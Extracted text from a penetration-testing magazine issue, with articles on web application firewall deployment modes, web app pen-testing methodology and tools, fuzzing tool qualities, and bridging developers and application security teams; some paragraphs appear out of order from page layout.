Several WAFs have the option of monitoring the data sent by the web server to the browser in such a way that they can learn its nature. In this way these filters can, to a certain extent, automatically prevent malicious code from reaching the browser if, for example, a web application does not sufficiently check the original data. Learning Mode is a profiling mode that indexes every URL and parameter in a stream of traffic in order to build a whitelist of acceptable URLs and parameters. In practice, however, a whitelist-only approach is quite cumbersome, requiring constant re-learning whenever the application changes; as a result, whitelist-only approaches quickly become outdated due to the constant tuning needed to maintain the whitelist profiles. The contrary blacklist-only approach, however, offers attackers too many loopholes. Consequently, the ideal solution relies on a combination of both whitelisting and blacklisting. This can be made easy to use with templated negative security profiles (e.g. for standard applications like Outlook Web Access, SharePoint or Oracle applications), augmented by a whitelist for high-value sub-sections such as an order entry page.
To prevent a high number of false positives, some manufacturers provide an exception profiler. This flags to the administrator entries that may violate the policies but, based on an extensive heuristic analysis, can still be categorized as legitimate. At the same time the exception profiler makes suggestions for exemption clauses that prevent a similar false positive from recurring.
Some WAFs provide different operating modes: Bridge Mode (as Bridge Path) or Proxy Mode (as One-Arm Proxy or Full Reverse Proxy). In Bridge Mode the WAF is used as an in-line bridge path and works with the same address for the virtual IP and the backend server. Although this configuration avoids changes to the existing network structure, and as such can be integrated very easily and quickly to protect an endangered web application, Bridge Mode deployments sacrifice security and application acceleration for network simplicity. Additionally, this mode means that all data is passed on to the web application, including potential attacks, even if the security checks have been conducted.
The by far safer operating mode for a WAF is the Full Reverse Proxy configuration, as this is used in line and uses both of the system's physical ports (WAN and LAN). As a proxy, a WAF can protect web applications against attacks such as Session Spoofing or Cross-Site Request Forgery, which is not possible in Bridge Mode, and some special functions are only available here. As a Full Reverse Proxy a WAF provides, for example, Instant SSL, which converts HTTP pages to HTTPS without changes to the code.
Proxy WAFs also provide a whole range of further security functions. They facilitate the translation of web addresses, and as such the rewriting of URLs used by public requests to the web application's hidden URLs. This means that the application's actual web address remains cloaked. With Proxy WAFs, SSL is much faster and the response times of the web application can also be accelerated. They also facilitate cloaking techniques, Layer 7 rules (to fend off Denial of Service attacks), as well as authentication and authorization. Cloaking, the concealment of one's
Figure 3 A Web Application Firewall should also protect the outgoing traffic to make data theft more difficult
own IT infrastructure, is the best way to evade the previously mentioned scan attacks which attackers use to seek out easy prey. By masking outgoing data, protection can be obtained against data theft, and cookie security prevents identity theft. But Proxy WAFs, too, must be configured according to the respective requirements; penetration tests help with the correct configuration.
Demands on Penetration Testers
When penetration testers look for weak spots they should also take into account the Payment Card Industry Data Security Standard (PCI DSS) 2.0. This defines rules for transmitting and storing Primary Account Number (PAN) information. Companies are required to develop secure web applications and maintain them constantly. Further points define formal risk checks and test processes intended to uncover high-risk weak spots. In order to check whether systems comply with PCI DSS, penetration testers must heed the following requirements:
• Does the system have a Web Application Firewall?
• Does the web traffic pass through a WAF proxy function?
• Are the web servers shielded against direct access by attackers?
• Is there SSL encryption for the data traffic, even if the application or the server does not support it?
• Are all known and unknown threats blocked?
A further point is protection against data theft. This involves checking whether the protection mechanism inspects the outgoing data traffic for the possible exfiltration of sensitive data and then stops it.
Penetration testers can fall back on web scanners to run security checks on web applications; several WAFs provide extra interfaces to automate such tests.
Since by its very nature a WAF stands on the front line, certain test criteria should be applied to it as well. These include in particular identity and access management. Here the principle of least privilege applies: users are awarded privileges only on a need-to-have basis for their work or the use of the web application, and all other privileges are blocked. Integration of the WAF into Active Directory, eDirectory or other RADIUS- or LDAP-compatible authentication services makes this work easier.
The user interface is also an especially critical point, because it is the basis for safe WAF configuration. Unintelligible or poorly structured user interfaces lead to incorrect settings, which cancel out the protective functions. If, by contrast, the functions can be grasped intuitively and are clearly displayed, easy to understand and easy to set, then in practice this makes the greatest contribution to system security. A further plus is a user interface that is identical across several of the manufacturer's products or, even better, a management center which administrators can use to manage numerous other network and security products alongside the WAF. The administrators can then rely on familiar settings processes for security clusters, which ensures that security configurations for each cluster are consistent across the organization. An extensive penetration test of web applications should therefore take the ergonomics of the WAF interface into account in its evaluation, along with the consistency of security deployment across applications and sites.
In summary, any web application, old or new, needs to be secured by a WAF in Full Proxy Mode. Penetration testers should check whether the WAF reliably cloaks system information in order to make attacks on the infrastructure less likely in the first place. They should also check whether it prevents the hacking of the application itself with common or new means, whether it secures all the backend systems the application connects to, and whether it stops leakage of sensitive data when the web application has weaknesses the WAF cannot level out. If penetration testers are not just after a security snapshot but want to help their customers create sustainable security, they should always include the WAF's administration in their assessment.
OLIVER WAI
Oliver Wai leads product marketing for Barracuda's line of Web application security and application delivery products. In his role, Oliver is a core member of Barracuda's security incident response team and writes frequently about the latest application security threats. Prior to Barracuda Networks, Oliver held positions at Google, Integration Appliance and Brocade Communications. Oliver has an MS in Management Science & Engineering from Stanford University and a BS (cum laude) in Computer Engineering from Santa Clara University.
In the upcoming issue of PenTest:
If you would like to contact the PenTest team, just send an email to en@pentestmag.com. We will reply as soon as possible.
Web Session Management
Password management in code
ETHical Ghosts on SF1
Preservation namely in the online gambling industry
Cyber Security War
Available to download on December 22nd
WEB APP SECURITY
Page 12 httppentestmagcom012011 (1) November
Dynamic web applications usually use technologies such as ASP, ASP.NET, PHP, Ajax, JSP, Perl, ColdFusion and Flash.
These applications expose financial data, customer information and other sensitive, confidential data that require authentication and authorization. Ensuring that web applications are secure is a critical mission that businesses have to undertake to achieve the desired security level for such applications. With such critical data accessible from the public domain, web application security testing also becomes a paramount process for all web applications that are exposed to the outside world.
Introduction
Penetration testing (also called pen testing) is usually conducted by ethical hackers, where the security team reviews application security vulnerabilities to discover potential security risks. Such a process requires deep knowledge and experience in a variety of different tools and a range of exploits that can achieve the required tasks.
During pen testing, different web application vulnerabilities are tested (e.g. Input Validation, Buffer Overflow, Cross-Site Scripting, URL Manipulation, SQL Injection, Cookie Modification, Bypassing Authentication and Code Execution). A typical pen test involves the following procedures:
• Identification of Ports – In this process, ports are scanned and the associated running services are identified.
• Software Services Analyzed – In this process, both automated and manual testing is conducted to discover weaknesses.
• Verification of Vulnerabilities – This process helps verify that the vulnerabilities are real and shows where a weakness might be exploited, to help remediate the issues.
• Remediation of Vulnerabilities – In this process, the vulnerabilities are resolved and then re-tested to ensure they have been addressed.
Part of the initiative of securing web applications is to include the security development lifecycle as part of the software development lifecycle, where the number of security-related design and coding defects, as well as the severity of any defects that remain undetected, can be reduced or eliminated. Although these initiatives solve some of the security problems, some undiscovered defects will remain even in the most scrutinized web applications. Until scanners can harness true artificial intelligence and put anomalies into context or make normative judgments about them, the struggle to find certain vulnerabilities will persist.
Web Application Security and Penetration Testing
In recent years web applications have grown dramatically within many organizations and businesses, and such entities have become very dependent on this technology as part of their business lifecycle.
Automated Scanning vs Manual Penetration Testing
A vulnerability assessment simply identifies and reports vulnerabilities, whereas a pen test attempts to exploit them to determine whether unauthorized access or other malicious activity is possible. By performing a pen test to simulate an attack, it is possible to evaluate whether an application has any potential vulnerabilities resulting from poor or improper system configuration, hardware or software flaws, or weaknesses in the perimeter defences protecting the application.
With more than 75% of attacks occurring over the HTTP/HTTPS protocols and more than 90% of web applications containing some type of security vulnerability, it is essential that organizations implement strong measures to secure their web applications. Most of these attacks occur at the front door of the organization, where the entire online community has access (i.e. port 80 and port 443). With the complexity and the tremendous amount of sensitive data that exist within web applications, consumers not only expect but also demand security for this information.
That said, securing a web application goes far beyond testing the application with automated systems and tools or with manual processes. Security implementation begins in the conceptual phase, where the security risk introduced by the application is modeled and the required countermeasures are identified. Web application security should be treated as another quality vector of every application, considered through every step of the application lifecycle.
Discovering web application vulnerabilities can be performed through different processes:

• Automated process – where scanning tools or static analysis tools are used
• Manual process – where penetration testing or code review is used

Web application vulnerability types can be grouped into two categories:
Technical Vulnerabilities
Such vulnerabilities can be examined through tests such as Cross-Site Scripting, Injection Flaws and Buffer Overflow. Automated systems and tools which analyze and test web applications are much better equipped to test for technical vulnerabilities than manual penetration tests. While automated testing and scanning tools may not be able
to address 100% of all technical vulnerabilities, there is no reason to believe that such tools will achieve that goal in the near future either. Current problems facing web application tools include the following: client-side generated URLs, required JavaScript functions, application logout, transaction-based systems requiring specific user paths, automated form submission, one-time passwords, and infinite web sites with random URL-based session IDs.
Logical Vulnerabilities
Such vulnerabilities can be exploited to manipulate the logic of the application into doing tasks that were never intended. While both an automated scanning tool and a skilled penetration tester can navigate through a web application, only the latter is able to understand the logic behind a specific workflow or how the application works in general. Understanding the logic and the flow of an application allows the manual pen tester to subvert the business logic and expose security vulnerabilities. For instance, an application might direct the user from point A to point B to point C based on the logic flow implemented within the application, where point B represents a security validation check. A manual review of the application might show that it is possible for attackers to go directly from point A to point C, bypassing the security validation at point B.
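The A-to-C bypass can be modeled in a few lines. This is a deliberately toy example (the function names and workflow are invented): step C trusts that the check at step B already ran, so calling C directly skips the validation entirely.

```python
def step_b_validate(session: dict) -> None:
    """The security validation check at point B."""
    session["validated"] = True

def step_c_checkout(session: dict) -> str:
    # Flawed: defaults to trusting the session if B never set the flag.
    # A robust version would default to False and reject the request.
    return "order placed" if session.get("validated", True) else "denied"

# Intended path: A -> B -> C
s1 = {}
step_b_validate(s1)
print(step_c_checkout(s1))            # order placed

# Attacker path: A -> C, skipping B -- the flawed default lets it through
s2 = {}
print(step_c_checkout(s2))            # order placed (logic flaw)
```

No scanner signature matches this request; only someone who understands the intended workflow notices that C is reachable without B, which is why logical flaws favor manual testing.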
History has proven that software bugs, defects and logical flaws are consistently the primary cause of commonly exploited application software vulnerabilities, which can lead to unauthorized access to systems, networks and application information. It has also been shown that most security breaches occur due to vulnerabilities within the web application layer (i.e. attacks using the HTTP/HTTPS protocol). Against such attacks, traditional security mechanisms such as firewalls and IDS provide little or no protection.
Security analyses review the critical components of a web-based portal, e-commerce application or web services platform. Part of this work is to identify vulnerabilities inherent in the code of the web application itself, regardless of the technology implemented, the back-end database or the web server used by the application.
It is imperative to point out that web application penetration assessments should be designed based upon a defined threat model. They should also be based upon an evaluation of the integration between components (e.g. third-party components and in-house-built components) and the overall deployment configuration, which represents a solid choice for establishing a baseline security assessment. Application penetration assessments serve as a cost-effective mechanism to identify a set of vulnerabilities in a given application: they expose the most likely exploitable vulnerabilities
Figure 1 The different activities of the Pen Testing processes
and allow testers to find similar instances of vulnerabilities throughout the code.
How Web Application Pen Testing Works
Most web application penetration testing is carried out from security operations centers, with access to the resources under test provided remotely over the Internet using different penetration technologies. At the end of such a test, the application penetration test provides a comprehensive security assessment for various types of applications (e.g. commercial enterprise web applications, internally developed applications, web-based portals and e-commerce applications). Figure 1 describes some of the activities that usually happen during the pen testing process, including Application Spidering, Authentication Testing, Session Management Testing, Data Validation Testing, Web Service Testing, Ajax Testing, Business Logic Testing, Risk Assessment and Reporting.
In conducting web penetration testing, different approaches can be used to achieve the security vulnerability assessment; some of these approaches are:
• Zero-Knowledge Test (Black Box) – In this approach the application security testing team does not have any inside information about the target environment, and the knowledge gained is based on information that can be found in the public domain. This type of test is designed to provide the most realistic penetration test possible, since in many cases attackers start with no real knowledge of the target systems.
• Partial-Knowledge Test (Gray Box) – In this approach partial knowledge about the environment under test is gained before conducting the test.
• Source Code Analysis (White Box) – In this approach the penetration test team has full information about the application and its source code. In such a test the security team performs a line-by-line code review in an attempt to find any flaws that could allow attackers to take control of the application, perform a denial of service attack against it, or use such flaws to gain access to the internal network.
It is also important to point out that penetration testing can be carried out as two different types of testing:
• External Penetration Testing
• Internal Penetration Testing
Both types of testing can be conducted with minimal information (black box) or with full information (white box).
Figure 2 The different phases of the Pen Testing
Figure 3 shows the different procedures and steps that can be used to conduct penetration testing. The following is a description of these steps:
• Scope and Plan – In this step the scope of the penetration test is identified, and the project plan and resources are defined.
• System Scan and Probe – In this step, system scanning within the defined scope of the project is conducted: automated scanners examine the open ports and scan the system to detect vulnerabilities, and previously collected hostnames and IP addresses are used at this stage.
• Creation of Attack Strategies – In this step the testers prioritize the systems and the attack methods to be used, based on the type of each system and how critical it is. Also in this stage the penetration testing tools are selected, based on the vulnerabilities detected in the previous phase.
• Penetration Testing – In this step the exploitation of vulnerabilities using automated tools is conducted: the attack methods designed in the previous phase are used to conduct the following tests: data and service pilferage, buffer overflow, privilege escalation and denial of service (if applicable).
• Documentation – In this step all the vulnerabilities discovered during the test are documented; evidence of exploitation and penetration testing findings should also be presented later within the final report.
• Improvement – The final step of the penetration test is to provide the corrective actions for closing the discovered vulnerabilities within the systems and the web applications.
Web Application Testing Tools
Throughout pen testing, a structured methodology has to be followed, with steps such as Enumeration, Vulnerability Assessment and Exploitation. Some of the tools that might be used within these steps are:
• Port Scanners
• Sniffers
• Proxy Servers
• Site Crawlers
• Manual Inspection
The output from the above tools allows the security team to gather information about the environment, such as open ports, services, versions and operating systems. The vulnerability assessment utilizes the data gathered in the previous step to uncover potential vulnerabilities in the web server(s), application server(s), database server(s) and any intermediary devices such as firewalls and load balancers. It is also important for the security team not to rely solely on the tools during the assessment phase to discover vulnerabilities; manual inspection of items such as HTTP responses, hidden fields and HTML page sources should be part of the security assessment as well.
Some of the areas that can be covered during the vulnerability assessment are the following:
• Input validation
• Access control
Figure 3 Testing techniques procedures and steps
• Authentication and Session Management (Session ID flaws) vulnerabilities
• Cross-Site Scripting (XSS) vulnerabilities
• Buffer overflows
• Injection flaws
• Error handling
• Insecure storage
• Denial of Service (if required)
• Configuration management
• Business logic flaws
• SQL Injection faults
• Cookie manipulation and poisoning
• Privilege escalation
• Command injection
• Client-side and header manipulation
• Unintended information disclosure
During the assessment, testing of the above vulnerabilities is performed, except those that could cause Denial of Service conditions, which are usually discussed beforehand. Possible options for Denial of Service testing include testing during a specific time window, testing a development system, or manually verifying the condition that may be responsible for the vulnerability. Once the vulnerability assessment is complete, the final reports, recommendations and comments are summarized, and better solutions are suggested for the implementation process. At this point the penetration test is only half done: the most important part of the assessment still has to be delivered, namely the informative report that highlights all the risks found during the penetration phase.
The following are some of the commonly used tools for traditional penetration testing.
Port Scanners
Such tools are used to gather information about which network services are available for connection on each target host. A port scanning tool examines or questions each of the designated network ports or services on the target system, and most of these tools are able to scan both TCP and UDP ports. Another common feature of port scanners is their ability to determine the operating system type and its version number, since protocol implementations such as TCP/IP can vary in their specific responses. Configuration flexibility in port scanners serves to examine different port configurations as well as to hide from network intrusion detection mechanisms.
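At its core, the TCP side of what these tools automate is a connect scan, which can be sketched with the standard library alone (the host name below is a placeholder; only ever scan systems you are authorized to test):

```python
import socket

def scan(host: str, ports) -> list:
    """Attempt a TCP connection to each port; collect those that accept."""
    open_ports = []
    for port in ports:
        with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
            s.settimeout(0.5)                    # keep the scan fast
            if s.connect_ex((host, port)) == 0:  # 0 means connect succeeded
                open_ports.append(port)
    return open_ports

# Example (placeholder host -- run only against authorized targets):
# print(scan("scanme.example", [22, 80, 443, 8080]))
```

Real scanners add UDP probes, OS fingerprinting from protocol quirks, and timing/stealth options on top of this basic loop.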
Vulnerability Scanners
While port scanners only produce an inventory of the types of available services, vulnerability scanners
attempt to exercise vulnerabilities on their target systems. The main goal of a vulnerability scanner is to provide a means of meticulously examining each and every available network service on the targeted hosts. These scanners work from a database of documented network service security defects, exercising each defect on each available service of the target hosts. Most commercial and open source scanners scan the operating system for known weaknesses and unpatched software, as well as configuration problems such as user permission management defects or problems with file access controls. Despite the fact that both network-based and host-based vulnerability scanners do little to help with a web application-level penetration test, they are fundamental tools for any penetration testing. Good examples of such tools are Internet Scanner, QualysGuard and Core Impact.
Application Scanners
Most application scanners can observe the functional behaviour of an application and then attempt a sequence of common attacks against it. Popular commercial application scanners include AppScan and WebInspect.
Web Application Assessment Proxies
Assessment proxies work by interposing themselves between the web browser used by the tester and the target web server, where data can be viewed and manipulated. Such flexibility enables different tricks to exercise the application's weaknesses and its associated components. For example, penetration testers can view all cookies, hidden HTML fields and other data used by the web application, and attempt to manipulate their values to trick the application.
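One small piece of what an assessment proxy surfaces for the tester can be sketched with the standard library: pulling the hidden form fields out of an intercepted response body (the sample HTML and field names below are invented for illustration).

```python
from html.parser import HTMLParser

class HiddenFieldFinder(HTMLParser):
    """Collect name/value pairs of hidden <input> fields from a response."""
    def __init__(self):
        super().__init__()
        self.fields = {}

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "input" and a.get("type") == "hidden":
            self.fields[a.get("name")] = a.get("value")

# Invented intercepted response body:
response_body = '<form><input type="hidden" name="price" value="9.99"></form>'
finder = HiddenFieldFinder()
finder.feed(response_body)
print(finder.fields)   # {'price': '9.99'} -- a value a tester may try to tamper with
```

A hidden field carrying something like a price is exactly the kind of client-side state a tester would rewrite in transit to see whether the server trusts it.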
The above penetration testing practice is called black box testing. Some organizations use hybrid approaches, where traditional penetration testing is combined with some level of source code analysis of the web application. Most penetration testing tools can perform these practices; however, choosing the right tool for the job is vital for the success of the penetration process and the accuracy of the results.
The following are some of the common features that should be implemented within penetration testing tools:
• Visibility – The tool must provide the required visibility for the testing team, which can be used as a feedback and reporting feature of the test results
• Extensibility – The tool can be customized, and it must provide a scripting language or plug-in capabilities that can be used to construct customized penetration tests

WEB APP SECURITY
Page 18 httppentestmagcom012011 (1) November
• Configurability – A tool that can be configured is highly recommended, to ensure the flexibility of the implementation process
• Documentation – The tool should provide proper documentation, with a clear explanation of the probes performed during the penetration testing
• License Flexibility – A tool that can be used without specific constraints, such as a particular IP number range or license limits, is a better tool than others
Security Techniques for Web Apps
Some of the security techniques that can be implemented within the web application to eliminate vulnerabilities are:
• Sanitize the data coming from the browser – Any data sent by the browser can never be trusted (e.g. submitted form data, uploaded files, cookie data, XML, etc.). If web developers fail to sanitize the incoming data, it might lead to vulnerabilities such as SQL injection, cross-site scripting and other attacks against the web application
• Validate data before form submission and manage sessions – Cross Site Request Forgery (CSRF) can occur when a web application accepts form submission data without verifying that it came from its own web form. It is imperative for the web application to verify that the submitted form is one that the web application had produced and served
• Configure the server in the best possible way – Network administrators have to follow some guidelines for hardening web servers. Some of these guidelines are: maintain and update proper security patches, kill all redundant services and shut down unnecessary ports, confine access rights to folders and files, employ SSH (the Secure Shell network protocol) rather than telnet or FTP, and install efficient anti-malware software
In addition to the above guidelines, it is always important to enforce strong passwords for web application users and to protect any stored passwords.
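As a minimal sketch of two of the techniques above, assuming a Python back end (the table name, field names and helper names are illustrative, not from any specific framework): parameterized SQL statements neutralise injection attempts from unsanitized form data, and a per-session token compared in constant time guards form submissions against CSRF.

```python
import hmac
import secrets
import sqlite3

def find_user(conn, username):
    # Placeholders let the driver escape the value, the classic defence
    # against SQL injection from untrusted form data.
    cur = conn.execute("SELECT id, name FROM users WHERE name = ?", (username,))
    return cur.fetchone()

def issue_csrf_token(session):
    # Embed this token in every form the application serves.
    session["csrf_token"] = secrets.token_hex(32)
    return session["csrf_token"]

def verify_csrf_token(session, submitted):
    # compare_digest avoids timing side channels on the comparison.
    return hmac.compare_digest(session.get("csrf_token", ""), submitted or "")
```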
Conclusion
A vulnerability assessment is the process of identifying, prioritizing, quantifying and ranking the vulnerabilities in a system; such a process determines whether there are weaknesses or vulnerabilities in the system subjected to the assessment. Penetration testing includes all of the processes in a vulnerability assessment, plus the exploitation of the vulnerabilities found in the discovery phase.
Unfortunately, an all-clear result from a penetration test doesn't mean that an application has no problems. Penetration tests can miss weaknesses such as session forging and brute-force detection, and as such, implementing security throughout an application's lifecycle is an imperative process for building secure web applications.
As automated web application security tools have matured in recent years, automated security assessment will continue, over time, to reduce both the uncertainty of determination (i.e. false positive results) and the potential to miss some issues (i.e. false negative results).
Both automated and manual penetration testing can be used to discover critical security vulnerabilities in web applications. Currently, automated tools cannot entirely replace manual penetration testing. However, if automated tools are used correctly, organizations can save a lot of money and time in finding a broad range of technical security vulnerabilities in web applications. Manual penetration testing can then be used to augment those results with the logical vulnerabilities that automated testing cannot find.
Finally, it is important to point out that, over time, manual testing for technical vulnerabilities will move from difficult to impossible as the size, scope and complexity of web applications increase. The fact that many enterprise organizations will not be able to dedicate the time, money and effort required to assess thousands of web applications will increase the use of automated tools rather than relying on the human factor to manually test these applications. Also, relying on human effort alone to test for thousands of technical vulnerabilities within these applications is subject to human error and simply cannot be trusted.
BRYAN SOLIMAN
Bryan Soliman is a Senior Solution Designer currently working with the Ontario Provincial Government of Canada. He has over twenty years of Information Technology experience, with a Bachelor's degree in Engineering, a Bachelor's degree in Computer Science and a Master's degree in Computer Science.
WHAT IS A GOOD FUZZING TOOL?
Fuzz testing is the most efficient method for discovering both known and unknown vulnerabilities in software. It is based on sending anomalous (invalid or unexpected) data to the test target – the same method that is used by hackers and security researchers when they look for weaknesses to exploit. There are no false positives: if the anomalous data causes an abnormal reaction, such as a crash in the target software, then you have found a critical security flaw.
In this article, we will highlight the most important requirements for a fuzzing tool, and also look at the most common mistakes people make with fuzzing.
Documented test cases
When a bug is found, it needs to be documented for your internal developers or for vulnerability management towards third-party developers. When there are billions of test cases, automated documentation is the only possible solution.
Remediation
All found issues must be reproduced in order to fix them. Network recording (PCAP) and automated reproduction packages help you deliver the exact test setup to the developers, so that they can start developing a fix for the found issues.
MOST COMMON MISTAKES IN FUZZING
Not maintaining proprietary test scripts: proprietary test scripts are not rewritten even though the communication interfaces change or the fuzzing platform becomes outdated and unsupported.
Ticking off the fuzzing check-box: if the requirement for testers is to do fuzzing, they almost always choose the quick and dirty solution, which is almost always random fuzzing. Test requirements should focus on coverage metrics to ensure that testing aims to find most of the flaws in the software.
Using hardware test beds: appliance-based fuzzing tools become outdated really fast, and the speed requirements for the hardware increase each year. Software-based fuzzers are scalable in performance, can easily travel with you to wherever testing is needed, and are not locked to a physical test lab.
Unprepared for the cloud: a fixed location for fuzz testing makes it hard for people to collaborate and scale the tests. Be prepared for virtual setups, where you can easily copy the setup to your colleagues or upload it to cloud environments.
PROPERTIES OF A GOOD FUZZING TOOL
There is an abundance of fuzzing tools available. How do you distinguish a good fuzzer? What are the qualities that a fuzzing tool should have?
Model-based test suites
Random fuzzing will certainly give you some results, but to really target the areas that are most at risk, the test cases need to be based on actual protocol models. This results in a huge improvement in test coverage and a reduction in test execution time.
Easy to use
Most fuzzers are built for security experts, but in QA you cannot expect all testers to understand what buffer overflows are. A fuzzing tool must come with all the security know-how built in, so that testers only need domain expertise in the target system to execute tests.
Automated
Creating fuzz test cases manually is a time-consuming and difficult task. A good fuzzer will create test cases automatically. Automation is also critical when integrating fuzzing into regression testing and bug reporting frameworks.
Test coverage
Better test coverage means more discovered vulnerabilities. Fuzzer coverage must be measurable in two aspects: specification coverage and anomaly coverage.
Scalable
Time is almost always an issue when it comes to testing, and the user must have control over fuzzing parameters such as test coverage. In QA you rarely have much time for testing and therefore need to run tests fast. Sometimes you can spend more time on testing and can select other test completion criteria.
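The anomalous-data idea behind fuzzing can be sketched as a toy mutation fuzzer in Python; a real model-based fuzzer generates far better-targeted cases, as the text above argues. The parse_record target and its planted bug are invented for the example.

```python
import random

def parse_record(data: bytes):
    """Toy target with a bug: it trusts the length byte when reading the
    trailing checksum byte, so an oversized length raises IndexError."""
    length = data[0]
    payload = data[1:1 + length]
    checksum = data[1 + length]        # no bounds check: the planted bug
    return payload, checksum

def mutate(sample: bytes, rng) -> bytes:
    data = bytearray(sample)
    pos = rng.randrange(len(data))
    data[pos] = rng.randrange(256)     # flip one byte to a random value
    return bytes(data)

def fuzz(target, sample: bytes, iterations=2000, seed=1):
    """Feed mutated copies of a valid sample to the target and collect the
    inputs that raise an exception (the abnormal reactions)."""
    rng = random.Random(seed)
    crashes = []
    for _ in range(iterations):
        case = mutate(sample, rng)
        try:
            target(case)
        except Exception as exc:
            crashes.append((case, type(exc).__name__))
    return crashes
```

Running `fuzz(parse_record, bytes([3]) + b"abc" + bytes([0x7F]))` quickly turns up inputs whose mutated length byte crashes the parser, which is exactly the crash-equals-finding property described above.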
Application Security members are considered like the tax man asking for money: security is sometimes seen as a cost to pay in order to get an application into Production. Actually, it is a little bit everyone's fault. Since Security people and Developers usually do not talk the same language, it is difficult for the two groups to work together and give each other the necessary attention and feedback that they deserve.

Let's take a step back for a minute and let me clarify what I mean about language and communication. Consider this scenario. The Marketing department has asked for a brand new web portal that shows new products from the ACME corporation. Marketers usually do not know anything about technology; they just want to hit the market with an aggressive campaign for the new product line. Marketers might ask the developers something like Give us the latest Web 2.0, Social-enabled website, or something like that, to impress the customers. Plus, they would like it as soon as possible, and they provide a deadline that the developers must keep.

The developers brainstorm the idea, write out some specifications and requirements, start prototyping their ideas and eventually begin coding. They are under pressure to meet the deadline, and management usually presses even more. Security is slowly pushed aside so that coding and production can meet the deadline. Most software architecture is not designed with security in mind, and project Gantt charts usually include no security checkpoints for code testing, nor do they allow time for security fixes or remediation.
Developers are pushed to code the application so that they can meet the deadline. Acceptance tests and functionality tests are passed, and the application is almost ready for deployment when someone recalls something about security: Hey, we need to get this on-line, so we need to open up the firewall to allow access to it.
The Application Security group asks for additional information about the application and requests documentation of how the application was built. They do not see it from the developers' point of view of meeting the deadline that Management has imposed on them.
On the other side, developers do not see the problem from a security perspective: what risks to the IT infrastructure will potentially be exposed if someone breaks into the new application?
One solution to the problem is to execute a penetration test on the application and look at the results. Then security is happy, since they can test the application, and developers are happy once the penetration test report is complete. Many times a penetration test report contains recommended mitigation steps that impose additional time constraints on the application delivery. Reports usually contain just the symptom. For example, the report might have statements like a SQL injection is possible, not the real root cause: a parameter taken from a config file is not sanitized before utilization. The report does not contain all
Developers are from Venus, Application Security guys are from Mars
We know that Application Security people talk a different language than developers do, whenever we publish a report, make an assessment, or review a software architecture from a security point of view. There is a gap between developers and the Application Security group. The two teams must interact with each other to reach the same goal of building secure code.
but which is the right one to use to ensure secure code development?
.NET has one single monolithic framework, and Microsoft has invested money in security; it seems they did it the right way, but it is not Open Source, so professionals cannot contribute. A generic framework-based solution is not feasible. What about APIs? Developers do know how to use APIs, and having security controls embedded in a single library can save the day when writing source code. That is why OWASP introduced the ESAPI project: to provide a set of APIs that developers can use to embed security controls into their code.
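As a hedged sketch of the controls-in-one-library idea (in the spirit of ESAPI, but NOT the actual ESAPI API; the function names here are invented), a minimal Python helper module might expose output encoding and whitelist validation:

```python
import html
import re

def encode_for_html(value: str) -> str:
    """Output-encode untrusted data before writing it into an HTML page."""
    return html.escape(value, quote=True)

# Whitelist validation: only accept the characters we expect.
_USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{3,32}$")

def is_valid_username(value: str) -> bool:
    return bool(_USERNAME_RE.fullmatch(value))
```

The point is not the two functions themselves but the packaging: developers call one well-reviewed library instead of each team re-implementing a filter policy in its own dialect.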
The requested effort is minimal compared to translating an implement a filter policy finding into running code, and you (as a security professional) now speak the same language as the developer. This is a win-win approach: the security team and the application developers are now on the same page, and everyone is happy.

There is a third approach, which I will cover in a follow-up article: BDD. BDD is the acronym for Behavior Driven Development, which means that you start by writing test cases (taking examples from the Ruby on Rails world, you write test beds most of the time using rspec and cucumber) modeling how the source code has to behave according to the documentation or requirements specification. Initially, when you execute the test cases against your application, there will probably be failures that need to be corrected.

The idea is straightforward. As a result of the WAPT activity, instead of an implement a filtering policy statement, you produce a set of rspec/cucumber scenarios modeling how the source code should deal with malformed input. Then the development team starts correcting the code until it passes all of the test cases; when testing is complete and all tests pass, it means your source code has implemented a filtering policy. How has development changed? A new approach has been created to ensure that the developers implement your remediation statement. Now the developers understand how to handle malformed input and why it is so important to the Application Security group.
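Transposed from rspec/cucumber to plain Python for illustration (sanitize_comment is a hypothetical function under test, and the spec names are invented), the pen-test finding becomes an executable specification that developers run until it passes:

```python
import html

def sanitize_comment(text: str) -> str:
    """The code under test: developers keep fixing it until the specs pass."""
    return html.escape(text, quote=True)

# Behaviour specs derived from the WAPT report, replacing the prose
# "implement a filtering policy" remediation line.
def spec_script_tags_are_neutralised():
    assert "<script>" not in sanitize_comment("<script>alert(1)</script>")

def spec_benign_input_is_preserved():
    assert sanitize_comment("hello world") == "hello world"

for spec in (spec_script_tags_are_neutralised, spec_benign_input_is_preserved):
    spec()
```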
In the next article, we will see how to write some security tests using the BDD approach, in order to help a generic Java developer deal with cross-site scripting vulnerabilities.
of the information necessary to solve the problems at first glance. The developers cannot mitigate all of the issues in time to meet the deadline, so many times bug fixes are postponed or pushed into the next revision of the software, and in some cases they are never fixed. Another problem arises when the two groups talk to each other at the end of the whole process using a language with no common ground, which further confuses or annoys everyone and pushes the groups even further apart.
Communications Breakdown: You Give Me The Report
Penetration test reports are, most of the time, useless from the developers' point of view, because they do not give specific information that pinpoints where the problem is. This is very ironic, because the developers need to take full advantage of the security report, since most remediation consists of source code fixes.
Security issues found in penetration testing are not for the faint of heart. There can be a lot of high-level security issues, grouped by OWASP Top 10 (most of the time), with some generic remediation steps such as implement an input filtering policy. This information may not mean anything to a source code developer. Developers want to know the module, class or line where the problem exists so that they can fix it. Given enough time, developers can eventually determine where the problem lies, but usually they do not have the time to look through all of the code to find every testing error and still get the application into production.
Let's Close the Gap
What we need to do is define a common ground where security can be integrated into source code somewhat painlessly. Security should be transparent from the development team's point of view. This can be achieved by:
• Creating a development framework that has security built into it
• Designing an API to be used by the application
Putting security into the framework is the Rails approach. Rails' developers added a security facility inside the framework's helpers, so developers inherit secure input filtering, SQL injection protection and the CSRF protection token. This is a huge step forward in assisting developers with this problem. This methodology works when a programming language has a secure framework for developing web applications. This is true for the Ruby community (other frameworks, like Sinatra, have some security facilities as well). In the Java community, there are a lot of non-standardized frameworks available for Java developers
PAOLO PEREGO
Paolo Perego is an application security specialist interested in fixing the code he just broke with a web application penetration test. He's interested in code review, and he's working on his own hybrid analysis tool called aurora. He loves Ruby on Rails, kernel hacking, playing guitar and practising the Tae kwon-do ITF martial art. He's a husband, a daddy and a startup wannabe. You may want to check out Paolo's blog or look at his about me page.
